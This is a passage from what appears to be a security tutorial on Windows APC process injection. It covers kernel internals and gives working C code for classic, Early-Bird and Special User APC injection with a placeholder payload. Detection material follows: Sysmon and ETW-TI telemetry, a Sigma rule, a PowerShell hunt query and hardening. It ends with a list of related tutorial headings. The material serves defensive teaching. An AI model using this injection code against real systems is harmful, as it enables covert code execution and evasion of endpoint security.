`QueueUserAPC2`	`kernelbase.dll`	Wrapper that exposes Special User APCs to user code.
`KeInsertQueueApc`	Kernel	Attaches the initialized `KAPC` to the target thread’s queue.
`KiDeliverApc`	Kernel	Dispatches pending APCs at the kernel→user transition.
`ntdll!RtlDispatchAPC`	ntdll	Trampoline in user mode that calls the caller-supplied `APCProc`.

An important internal detail: when you call QueueUserAPC(pfn, hThread, dwData), the function pointer ntdll actually hands to NtQueueApcThread is not your pfn — it is ntdll!RtlDispatchAPC, and your pfn is passed as a parameter. This is why call-stack-aware EDRs frequently see RtlDispatchAPC as the immediate caller of the suspicious user-mode routine.

The dispatch sequence for a user-mode APC:

Caller obtains a thread handle with THREAD_SET_CONTEXT access.
QueueUserAPC → NtQueueApcThread → kernel enters KiInsertQueueApc.
KiInsertQueueApc checks whether the target is in an alertable wait with WaitMode == UserMode. If yes, it sets UserApcPending = TRUE and completes the wait with STATUS_USER_APC.
On the kernel→user transition, KiDeliverApc redirects execution to ntdll!RtlDispatchAPC, which invokes the original APCProc.

Flow diagram of the APC dispatch chain from QueueUserAPC through NtQueueApcThread, KiInsertQueueApc, KiDeliverApc, RtlDispatchAPC, to the final APCProc callback — Every layer of the APC dispatch chain is observable; EDRs see RtlDispatchAPC as the immediate caller of the injected routine.

6. Inspecting APC State in WinDbg

Read-only kernel introspection lets defenders and learners watch the structures the dispatcher mutates.

0: kd> !process 0 0 lsass.exe
0: kd> .process /r /p <EPROCESS>
0: kd> !thread <ETHREAD>

0: kd> dt nt!_KTHREAD <addr> ApcState
0: kd> dt nt!_KAPC_STATE <addr+offset>
   +0x000 ApcListHead       : [2] _LIST_ENTRY
   +0x020 Process           : Ptr64 _KPROCESS
   +0x028 KernelApcInProgress : UChar
   +0x029 KernelApcPending  : UChar
   +0x02a UserApcPending    : UChar

0: kd> !list "-t nt!_KAPC.ApcListEntry.Flink -e -x \"dt nt!_KAPC @$extret\" <ApcListHead[1]>"

Walking ApcListHead[1] for any thread reveals every pending user APC — its NormalRoutine, NormalContext, and ApcMode. On a healthy thread you typically see nothing; finding NormalRoutine pointing into a private RX region inside a system process is a classic incident-response artifact.

7. Classic APC Injection

The textbook variant. Every API call below is observable; the technique relies entirely on existing, documented APIs.

// Educational illustration of the API call chain only.
// No payload is included; `payload` is a placeholder used by defenders to
// recognize the pattern. Authorized testing only.

#include <windows.h>
#include <tlhelp32.h>

BOOL InjectViaAPC(DWORD pid, DWORD tid, const BYTE *payload, SIZE_T cb) {
    HANDLE hProc = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION,
        FALSE, pid);
    if (!hProc) return FALSE;

    HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
    if (!hThread) { CloseHandle(hProc); return FALSE; }

    LPVOID remote = VirtualAllocEx(hProc, NULL, cb,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc, remote, payload, cb, NULL);

    // QueueUserAPC schedules execution; it fires only when the target
    // thread enters an alertable wait.
    QueueUserAPC((PAPCFUNC)remote, hThread, 0);

    CloseHandle(hThread);
    CloseHandle(hProc);
    return TRUE;
}

Trigger conditions:

The target thread (tid) must enter an alertable wait. In long-lived service hosts this happens routinely.
The handle to the thread must carry THREAD_SET_CONTEXT. This is the most reliable single indicator: Sysmon EID 10 with a GrantedAccess mask covering THREAD_SET_CONTEXT against a high-value target image is the canonical detection (§12).

Notably, no new thread is created in the victim process — CreateRemoteThread is not called. This is exactly why APC injection evades Sysmon EID 8.

8. Early-Bird APC Injection

Classic injection has one weakness: you cannot predict when the victim thread will next become alertable. Early-bird removes the guesswork by injecting into a process you create yourself in a suspended state, then queuing the APC against the main thread before it has executed a single instruction.

// Educational pseudocode — illustrates API sequence, not payload.

STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };

CreateProcessA(NULL, "C:\\Windows\\System32\\notepad.exe", NULL, NULL,
               FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

LPVOID remote = VirtualAllocEx(pi.hProcess, NULL, cb,
                               MEM_COMMIT | MEM_RESERVE,
                               PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, remote, payload, cb, NULL);

QueueUserAPC((PAPCFUNC)remote, pi.hThread, 0);

// Thread services its APC queue as part of initialization, *before*
// running the original entry point.
ResumeThread(pi.hThread);

Why it works: when a newly created thread starts, the kernel transitions into user mode through ntdll!LdrInitializeThunk, which performs internal alertable waits during loader work. Any user APC queued before ResumeThread is delivered during that early window — before the legitimate entry point runs.

This variant straddles two ATT&CK sub-techniques: it is APC injection (T1055.004) but it also resembles Thread Execution Hijacking (T1055.003) because the suspended-thread-then-redirect pattern is structurally the same primitive.

Flow diagram of the Early-Bird APC injection sequence showing CreateProcess in suspended state, memory staging, APC queuing, ResumeThread, and payload execution before the legitimate entry point — Early-Bird queues the APC before the main thread has executed a single instruction, exploiting the alertable waits inside LdrInitializeThunk.

9. Special User APCs (RS5+): Bypassing the Alertable Requirement

Starting with Windows 10 RS5, the kernel introduced Special User APCs. The key behavioural change: these APCs are delivered with Mode == KernelMode to force a thread signal. The thread is interrupted mid-execution to run the special APC — the alertable-state requirement is gone.

They are queued via NtQueueApcThreadEx (passing 1 as the reserve handle) or through NtQueueApcThreadEx2, which exposes a flags field. kernelbase!QueueUserAPC2 is the documented Win32 wrapper.

// Conceptual signatures — confirm flag values and syscall semantics
// against the target SDK / Windows build before relying on them.

typedef NTSTATUS (NTAPI *pNtQueueApcThreadEx2)(
    HANDLE         ThreadHandle,
    HANDLE         UserApcReserveHandle,   // optional reserve object
    ULONG          ApcFlags,               // e.g. QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC
    PVOID          ApcRoutine,
    PVOID          SystemArgument1,
    PVOID          SystemArgument2,
    PVOID          SystemArgument3);

// Pseudocode dispatch — `Special User APC` interrupts a running thread
// without requiring it to be in SleepEx / WaitForSingleObjectEx.
pNtQueueApcThreadEx2 fn = (pNtQueueApcThreadEx2)
    GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQueueApcThreadEx2");

fn(hThread,
   NULL,
   QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC,   // forces in-execution delivery
   remote_routine,
   NULL, NULL, NULL);

Internally the kernel sets SpecialUserApcPending (added to KAPC_STATE for this purpose) and arranges delivery at the next return-to-user-mode opportunity regardless of wait state. This is a meaningful escalation of the primitive — it converts APC injection from “wait until the thread cooperates” to “interrupt the thread now.”

10. Real-World Threat Actor Usage

APC injection is documented at the technique level rather than the family level here; defenders should treat it as a primitive that recurs across many tradecraft variants:

DOUBLEPULSAR used kernel-mode APC injection to redirect user-mode threads from a kernel implant.
Multiple commodity and APT families catalogued under MITRE T1055.004 employ classic user-APC injection against svchost.exe, explorer.exe, and other long-running hosts.
The AtomBombing family of injection variants combines GlobalAddAtom/NtQueueApcThread to stage code through atom tables, then dispatch via APC.
Recent research (Check Point’s Thread Name-Calling) chains thread-name primitives with APC dispatch to evade EDR userland hooks.

11. Common Attacker Techniques

Technique	Description
Classic APC Injection	`OpenProcess` → `OpenThread(THREAD_SET_CONTEXT)` → `VirtualAllocEx` → `WriteProcessMemory` → `QueueUserAPC`. Fires when the target thread next enters an alertable wait.
Early-Bird APC	`CreateProcess(CREATE_SUSPENDED)` → write payload → `QueueUserAPC` → `ResumeThread`. APC fires during loader init, before the entry point.
Special User APC	`NtQueueApcThreadEx` / `NtQueueApcThreadEx2` with `QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC` — interrupts the thread mid-execution; no alertable wait required.
Kernel APC injection from a driver	Malicious driver calls `KeInsertQueueApc` directly against a user thread (DOUBLEPULSAR class). Mitigated by HVCI / driver signing.
Atom-table staged APC (AtomBombing)	Payload bytes shuttled into target via atom tables, then dispatched with `NtQueueApcThread`. Evades naive memory-write detections.
Self-APC for unhooking / staging	Queue an APC to the current thread + `SleepEx(0, TRUE)` to execute code outside hooked call paths.

12. Defensive Strategies & Detection

APC injection is deliberately quiet — it does not create a remote thread and so does not emit Sysmon EID 8. Detection therefore pivots on the handle-acquisition and memory-staging stages, plus dedicated ETW.

12.1 Sysmon

Event ID	Name	Why It Matters Here
EID 10	`ProcessAccess`	Captures the `OpenThread`/`OpenProcess` step. `GrantedAccess` masks covering `THREAD_SET_CONTEXT` (`0x0018`) and `PROCESS_VM_WRITE` (`0x0020`) against high-value images are the strongest signal.
EID 8	`CreateRemoteThread`	Will not fire for pure APC injection — but does fire for hybrid variants and is useful as a negative signal.
EID 1	`ProcessCreate`	Detects `CREATE_SUSPENDED` parent/child pairs typical of Early-Bird. Combine with short process lifetimes.

12.2 ETW — `Microsoft-Windows-Threat-Intelligence`

The Threat Intelligence ETW provider exposes a dedicated APC-injection sensor:

THREATINT_QUEUEUSERAPC_REMOTE_KERNEL_CALLER — logged by EtwTiLogInsertQueueUserApc / EtwTiLogQueueApcThread, invoked from inside KeInsertQueueApc. Introduced in Windows 10 build 1809.

Consumption requires a signed ELAM driver; the provider is reserved for AntiMalware-protected processes. In practice you receive this telemetry through your EDR vendor’s sensor.

12.3 Audit Policy

Enable Detailed Tracking → Audit Process Access → Security log EIDs 4656 / 4663 on handle requests. Filter for Object Type = Thread with access masks including THREAD_SET_CONTEXT.
Enable Audit Process Creation → EID 4688 with full command-line logging. Pair with CREATE_SUSPENDED heuristics where parent process behaviour permits inference.

12.4 Sigma Detection (Conceptual)

title: Suspicious Cross-Process Handle Acquisition Consistent With APC Injection
id: 00000000-0000-0000-0000-000000000000
status: experimental
logsource:
  product: windows
  service: sysmon
detection:
  selection_thread_ctx:
    EventID: 10
    GrantedAccess|contains:
      - '0x0018'    # THREAD_SET_CONTEXT | THREAD_GET_CONTEXT
      - '0x1fffff'  # PROCESS_ALL_ACCESS
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
      - '\winlogon.exe'
  selection_vm_write:
    EventID: 10
    GrantedAccess|contains: '0x0020'   # PROCESS_VM_WRITE
  timeframe: 5s
  condition: selection_thread_ctx and selection_vm_write
falsepositives:
  - Endpoint security products and legitimate debuggers
level: high

12.5 Behavioural Heuristics

The fingerprint that hunts well: VirtualAllocEx (RWX) → WriteProcessMemory → NtQueueApcThread issued by the same source process within a short window. Even when individual calls are noisy, the ordering is rare in benign software.

12.6 PowerShell — Hunt for Suspicious `ProcessAccess` Masks

Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath @"
*[System[EventID=10]]
"@ |
  Where-Object {
      $_.Properties[5].Value -match '0x0018|0x001f|0x1fffff' -and
      $_.Properties[6].Value -match 'lsass\.exe|svchost\.exe|winlogon\.exe'
  } |
  Select-Object TimeCreated,
                @{n='Source'; e={$_.Properties[4].Value}},
                @{n='Target'; e={$_.Properties[6].Value}},
                @{n='Access';e={$_.Properties[5].Value}}

12.7 Hardening

Mitigation	Description
Protected Process Light (PPL)	LSASS as `PPL-Antimalware` blocks `OpenThread(THREAD_SET_CONTEXT)` from untrusted callers.
Credential Guard	Moves LSASS secrets into a VSM-isolated process, removing it as an APC target entirely.
HVCI / Code Integrity	Prevents unsigned kernel drivers from calling `KeInsertQueueApc` against arbitrary threads.
ASR rule `9e6c4e1f-7d60-472f-ba1a-a39ef669e4b0`	Blocks credential theft from LSASS; complements but does not directly block APC injection.
Minimize alertable waits in sensitive code	Avoid `SleepEx(n, TRUE)` and other alertable waits in privileged service threads unless required.
ETW-TI via EDR	Deploy AV/EDR with an ELAM driver to consume `Microsoft-Windows-Threat-Intelligence` events in real time.

Graph diagram mapping four detection controls — Sysmon EID 10, ETW-TI, Audit EID 4656, and behavioural sequencing — plus hardening measures against the APC injection threat — Because APC injection skips CreateRemoteThread, detection pivots to handle-acquisition telemetry and dedicated ETW-TI sensors rather than Sysmon EID 8.

13. Tools for APC Analysis

Tool	Description	Link
WinDbg	Walk `KTHREAD.ApcState`, dump `KAPC` entries via `!list`, inspect `UserApcPending`.	microsoft.com
Process Hacker	Per-thread inspection, including private RX allocations and thread call stacks indicative of injected code.	processhacker.sourceforge.io
Sysmon	EID 10 / 8 / 1 telemetry for the handle-open and process-creation halves of the chain.	sysinternals.com
Sysinternals `handle.exe`	Enumerate handles a suspect process holds (look for foreign `Thread` / `Process` handles).	sysinternals.com
Volatility 3	Memory forensics: walk thread APC queues post-incident; identify injected RX regions.	volatilityfoundation.org
ETW Explorer / SilkETW	Inspect or subscribe to ETW providers (ETW-TI requires signed ELAM).	github.com
x64dbg	User-mode dynamic analysis of `QueueUserAPC` / `RtlDispatchAPC` call chains.	x64dbg.com

14. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection	T1055	Behavioural sequence: cross-process handle with VM-write rights followed by APC queuing.
Process Injection: Asynchronous Procedure Call	T1055.004	Sysmon EID 10 with `THREAD_SET_CONTEXT`; ETW-TI `THREATINT_QUEUEUSERAPC_REMOTE_KERNEL_CALLER`.
Thread Execution Hijacking	T1055.003	Early-Bird variant: `CREATE_SUSPENDED` process + `THREAD_SET_CONTEXT` handle + early-window APC.

T1055.004 is the primary mapping for this tutorial. The Early-Bird variant (§8) overlaps with T1055.003 because the suspended-thread + redirection structure is the same primitive — defenders should detect both.

Summary

APCs are a legitimate kernel facility for thread-targeted asynchronous work, and that property is exactly what makes them a first-class injection primitive.
The dispatch chain is QueueUserAPC → NtQueueApcThread → KiInsertQueueApc → KiDeliverApc → ntdll!RtlDispatchAPC → caller routine; every layer is observable.
User APCs require an alertable wait; Early-Bird sidesteps this via CREATE_SUSPENDED, and Special User APCs (NtQueueApcThreadEx2 + QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC) eliminate the requirement entirely.
APC injection deliberately evades Sysmon EID 8 — detection pivots on EID 10 with THREAD_SET_CONTEXT (0x0018) and PROCESS_VM_WRITE (0x0020) against high-value targets, plus Microsoft-Windows-Threat-Intelligence ETW (EtwTiLogInsertQueueUserApc).
Map to T1055.004 for classic / special-user APC, and additionally to T1055.003 for the Early-Bird suspended-thread variant; harden with PPL, Credential Guard, HVCI, and ETW-TI-consuming EDR.

Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

1. What Makes Code Position-Dependent?

2. The Problem with the IAT

3. Windows Memory Layout Primer: TEB, PEB, and the Loader

4. Walking the Module List to Find kernel32.dll

5. Parsing the PE Export Directory

6. Function Name Hashing (ROR-13)

7. RIP-Relative Addressing and the CALL/POP Trick

8. Stack Strings and Null-Byte Elimination

9. x64 ABI Constraints: Shadow Space and Alignment

10. Extraction and Controlled Testing

11. Common Attacker Techniques

12. Defensive Strategies & Detection

13. Tools for PIC Shellcode Analysis

14. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

1. From x86 to x64: What Actually Changed

2. The Microsoft x64 ABI Deep-Dive

Volatile vs Non-Volatile Registers

Side-by-Side: x86 Push vs x64 Register Load

3. Shadow Space: Why, What, and Where

4. Stack Alignment in Practice

5. Position-Independent Code Fundamentals

6. PEB Walking: Finding kernel32.dll Without Imports

7. Parsing the Export Address Table

8. Null-Byte and Bad-Character Avoidance

9. Shellcode Skeleton: Putting It Together

10. Common Attacker Techniques

11. Defensive Strategies & Detection

12. Tools for x64 Shellcode Analysis

13. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

Fibers: User-Mode Cooperative Threads

1. Cooperative vs. Preemptive Scheduling

2. The Fiber Execution Model

3. TEB Layout and the FIBER Structure

4. The Core Fiber API

5. Fiber Lifecycle: A Minimal Example

6. Context Switching Internals

7. Fiber Local Storage (FLS)

8. Building a Round-Robin Cooperative Scheduler

9. Legitimate Use Cases and Pitfalls

10. Common Attacker Techniques

11. Defensive Strategies & Detection

12. Tools for Fiber Analysis

13. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

Writing Your First Shellcode: x86 Reverse Shell from Scratch

1. What Is Shellcode? Constraints and Goals

2. x86 Calling Conventions and Stack Mechanics

3. The PEB Walk: Finding kernel32.dll Without Imports

4. Export Table Parsing: Resolving GetProcAddress

5. Bootstrapping Further API Resolution

6. Winsock Initialisation and Socket Creation

7. Spawning cmd.exe Over the Socket

8. Null-Byte Elimination and Bad-Character Audit

9. Testing and Verification

10. Common Attacker Techniques

11. Defensive Strategies and Detection

12. Tools for Shellcode Analysis

13. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

OPSEC Principles for Red Teamers: Staying Undetected

1. What OPSEC Means for Red Teamers

2. The Five-Step OPSEC Cycle Applied to Red Teaming

3. Thinking Like a Sensor: The Defender’s Telemetry Stack

4. Infrastructure OPSEC: Redirectors, Domains, and Segmentation

5. Malleable C2 Profiles and Traffic Shaping

6. Process & Memory OPSEC

7. Parent PID Spoofing

8. Network OPSEC: Sleep, Jitter, and Protocol Blending

3. Kernel Structures: `KAPC`, `KAPC_STATE`, `KTHREAD`

12.2 ETW — `Microsoft-Windows-Threat-Intelligence`

12.6 PowerShell — Hunt for Suspicious `ProcessAccess` Masks